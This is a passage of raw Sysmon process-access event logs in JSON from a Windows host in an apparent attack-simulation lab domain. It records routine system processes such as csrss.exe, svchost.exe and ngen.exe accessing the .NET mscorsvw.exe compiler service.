ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.367","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010DE6C0B00}","TargetProcessId":"2064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6981,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.367\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010DE6C0B00}\r\nTargetProcessId: 2064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.367","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010DE6C0B00}","TargetProcessId":"2064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6982,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.398\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-00105C700B00}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.398","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-00105C700B00}","TargetProcessId":"1476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6983,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.398\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-00105C700B00}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.398","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-00105C700B00}","TargetProcessId":"1476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6984,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.413\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-00105C700B00}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.413","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-00105C700B00}","TargetProcessId":"1476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6985,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.429\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010C8730B00}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.429","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010C8730B00}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6986,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.429\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010C8730B00}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.429","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010C8730B00}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6987,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.445\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010C8730B00}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:05.445","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010C8730B00}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6988,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:05.507\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21FF-5F25-0000-0010FBC90A00}\r\nTargetProcessId: 2972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll